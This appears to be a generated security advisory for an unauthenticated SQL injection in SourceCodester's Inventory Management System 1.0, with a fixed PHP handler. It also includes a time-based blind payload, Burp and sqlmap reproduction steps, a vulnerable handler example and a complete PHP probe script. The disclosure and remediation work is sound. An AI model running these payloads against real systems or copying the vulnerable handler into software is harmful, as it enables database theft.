SourceCodester Free and Open Source Inventory Management System SQL injection
Description
A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0. It has been classified as critical. Affected is an unknown function behind the endpoint /index.php?page=member. Manipulation of the argument columns[0][data] leads to SQL injection. The attack can be launched remotely and requires no authentication. The exploit has been disclosed to the public and may be used. VDB-237570 is the identifier assigned to this vulnerability.
Affected products
- Range: 1.0
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization in the `columns[0][data]` parameter allows SQL injection."
Attack vector
An attacker sends a crafted POST request to the member page endpoint, replacing the value of the `columns[0][data]` parameter with a SQL injection payload. The advisory demonstrates a time-based blind injection using `(select*from(select+sleep(3)union/**/select+1)a)` [ref_id=1]. Two details of that payload are worth noting: the `+` characters are literal unary-plus operators and `/**/` is an inline comment, so the expression is valid MySQL without containing a single space; and it is a bare subquery with no quote character, so it can only take effect where the parameter is spliced unquoted into the statement (for example as a column name in an ORDER BY clause or an item in a SELECT list). The advisory does not say which clause is affected. The attack is unauthenticated and can be launched remotely over HTTP. Because the parameter reaches the query without validation, an attacker can infer database contents one condition at a time from response timing, or dump them with sqlmap.
Affected code
The vulnerable endpoint is `/index.php?page=member` in the Free and Open Source Inventory Management System 1.0. The injection occurs in the `columns[0][data]` parameter of a POST request that the member page sends to retrieve customer data [ref_id=1]. The parameter name follows the DataTables server-side processing convention, in which `columns[i][data]` tells the server which field each table column reads from, together with `order[0][column]` and `order[0][dir]` for sorting; handlers of that shape typically place the column name directly into the query text. The exact server-side function handling this parameter is not named in the advisory, so which clause the value ends up in is not known.
What the fix does
No patch is provided in the advisory. The researcher only documents the discovery and verification of the blind SQL injection using manual testing and sqlmap [ref_id=1]. To remediate, every user-supplied value (search text, offsets, page sizes) should be passed to a prepared statement as a bound parameter. A column name such as the one carried in `columns[0][data]` is an identifier, not a value, and cannot be bound as a parameter, so the handler must map it through an allowlist of known column names (and the sort direction through `ASC`/`DESC`) and fall back to a fixed default for anything else. Escaping or "sanitizing" the string is not a substitute, since no quoting applies to an identifier in that position.
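As an added illustration, not code from the Inventory Management System (the advisory does not show its handler), the following contrasts the DataTables-style handler shape that matches the advisory's payload with a hardened version. The `customer` table, its columns, and the `$pdo` connection are assumptions made for the example.

```php
<?php
// Added example, not the project's code. Assumes a PDO connection to MySQL and a
// hypothetical `customer` table with columns id, name, email.

// Vulnerable shape. DataTables sends columns[i][data] (the field a column reads
// from) and order[0][column] (which column to sort on). Looking the name up and
// splicing it into ORDER BY puts attacker text unquoted into the SQL, which is
// exactly where `(select*from(select+sleep(3)union/**/select+1)a)` is a valid
// expression.
function listCustomersVulnerable(PDO $pdo, array $post): array
{
    $idx      = (int) ($post['order'][0]['column'] ?? 0);
    $orderCol = $post['columns'][$idx]['data'] ?? 'id';
    $dir      = $post['order'][0]['dir'] ?? 'asc';
    $sql      = "SELECT id, name, email FROM customer ORDER BY $orderCol $dir LIMIT 10";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened shape. Identifiers (column name, sort direction) cannot be bound as
// parameters, so they are mapped through an allowlist with a fixed fallback;
// everything that is a value (search text, offset, page size) is bound.
const CUSTOMER_COLUMNS = ['id', 'name', 'email'];

function listCustomersSafe(PDO $pdo, array $post): array
{
    $idx       = (int) ($post['order'][0]['column'] ?? 0);
    $requested = $post['columns'][$idx]['data'] ?? 'id';
    $orderCol  = (is_string($requested) && in_array($requested, CUSTOMER_COLUMNS, true))
        ? $requested
        : 'id';
    $dirParam  = $post['order'][0]['dir'] ?? 'asc';
    $dir       = (is_string($dirParam) && strtolower($dirParam) === 'desc') ? 'DESC' : 'ASC';
    $start     = max(0, (int) ($post['start'] ?? 0));
    $length    = min(100, max(1, (int) ($post['length'] ?? 10)));
    $value     = $post['search']['value'] ?? '';
    $needle    = '%' . (is_string($value) ? $value : '') . '%';

    // Only allowlisted identifiers reach the query text; all values are placeholders.
    $sql = "SELECT id, name, email FROM customer
            WHERE name LIKE :needle
            ORDER BY `$orderCol` $dir
            LIMIT :start, :length";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':needle', $needle, PDO::PARAM_STR);
    $stmt->bindValue(':start', $start, PDO::PARAM_INT);
    $stmt->bindValue(':length', $length, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

With `PDO::ATTR_EMULATE_PREPARES` left at its MySQL default, the `LIMIT` placeholders work only when bound as `PDO::PARAM_INT` with genuine integers, which the casts above guarantee. The allowlist is the part that actually closes the hole; the prepared statement on its own would not, because the sort column is not a bindable value.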
Preconditions
- network: The attacker must be able to send HTTP POST requests to the /index.php?page=member endpoint.
- auth: No authentication is required; the vulnerable page is accessible without logging in.
Reproduction
1. Set up the environment: extract the PHP source code, create a MySQL database named "ample", import `ample/database/ample.sql`, and configure `ample/app/config/config.php` with database credentials [ref_id=1].
2. Navigate to `http://ample/index.php?page=member` and use Burp Suite to capture the second POST request, the one that loads customer data.
3. Replace the value of `columns%5B0%5D%5Bdata%5D` with the URL-encoded payload `%28select%2Afrom%28select%2Bsleep%283%29union%2F%2A%2A%2Fselect%2B1%29a%29` and forward the request.
4. Observe a 3-second delay and "No matching records found" in the response, confirming time-based blind SQL injection [ref_id=1].
5. For automated verification, save the request to a file, replace the parameter value with `*` (sqlmap's injection-point marker), and run `sqlmap -r "payload" --dbs --level 3` [ref_id=1].
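The manual steps above as a single repeatable check, written here as an added example rather than the advisory author's tooling. It POSTs the advisory's payload in `columns[0][data]`, compares wall-clock time against a benign request, and repeats the pair so that one slow response on a busy host is not mistaken for a hit. The base URL `http://ample/`, the other DataTables fields in the body, and the choice of `id` as a harmless value for `columns[0][data]` are assumptions.

```php
<?php
// Added example, not the advisory author's tooling. Assumed: the advisory's
// endpoint under http://ample/, and that a plain column name such as "id" is a
// benign value for columns[0][data].

const TARGET        = 'http://ample/index.php?page=member';
const SLEEP_SECONDS = 3;
// Exactly the advisory's payload: unary `+` and `/**/` stand in for spaces, and
// no quote character is needed because the value lands unquoted in the query.
const PAYLOAD       = '(select*from(select+sleep(' . SLEEP_SECONDS . ')union/**/select+1)a)';

// Builds a minimal DataTables server-side processing body. http_build_query
// encodes the nested key as columns%5B0%5D%5Bdata%5D and the payload's
// + ( * / as %2B %28 %2A %2F, matching the encoded form in the reproduction steps.
function buildBody(string $columnData): string
{
    return http_build_query([
        'draw'    => 1,
        'columns' => [['data' => $columnData, 'searchable' => 'true', 'orderable' => 'true']],
        'order'   => [['column' => 0, 'dir' => 'asc']],
        'start'   => 0,
        'length'  => 10,
        'search'  => ['value' => '', 'regex' => 'false'],
    ]);
}

// POSTs the body and returns [elapsed seconds, response body].
function timedPost(string $url, string $body, int $timeout = 30): array
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => $body,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => $timeout,
        CURLOPT_HTTPHEADER     => [
            'Content-Type: application/x-www-form-urlencoded',
            'X-Requested-With: XMLHttpRequest',
        ],
    ]);
    $t0   = microtime(true);
    $resp = curl_exec($ch);
    $dt   = microtime(true) - $t0;
    curl_close($ch);
    return [$dt, $resp === false ? '' : $resp];
}

// The probe counts only if it is slower than the baseline by roughly the
// requested sleep; network jitter alone should not reach that margin.
function isDelayed(float $baseline, float $probe, float $slack = 0.5): bool
{
    return ($probe - $baseline) >= (SLEEP_SECONDS - $slack);
}

function main(): int
{
    $hits = 0;
    for ($i = 0; $i < 2; $i++) {
        [$base]        = timedPost(TARGET, buildBody('id'));
        [$slow, $body] = timedPost(TARGET, buildBody(PAYLOAD));
        printf("baseline %.2fs  probe %.2fs  body: %s\n", $base, $slow, substr($body, 0, 60));
        $hits += isDelayed($base, $slow) ? 1 : 0;
    }
    echo $hits === 2 ? "time-based blind SQLi confirmed\n" : "not confirmed\n";
    return $hits === 2 ? 0 : 1;
}

exit(main());
```

Run it with `php probe.php` against a local instance set up as in step 1. Sending the baseline immediately before each probe keeps server load and network conditions comparable; if the probe consistently lands about 3 seconds behind the baseline while the body still reads "No matching records found", the injection is confirmed and sqlmap can take over the extraction.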
Generated on May 24, 2026. Inputs: CWE entries and the cited advisory; no fix-commit diffs were available because no patch has been published. Citations validated against bundle.
References
- github.com/Jacky-Y/vuls/blob/main/README.md (exploit write-up; mitre)
- vuldb.com (signature, permissions-required)
- vuldb.com (vdb-entry, technical-description)
News mentions
No linked articles in our index yet.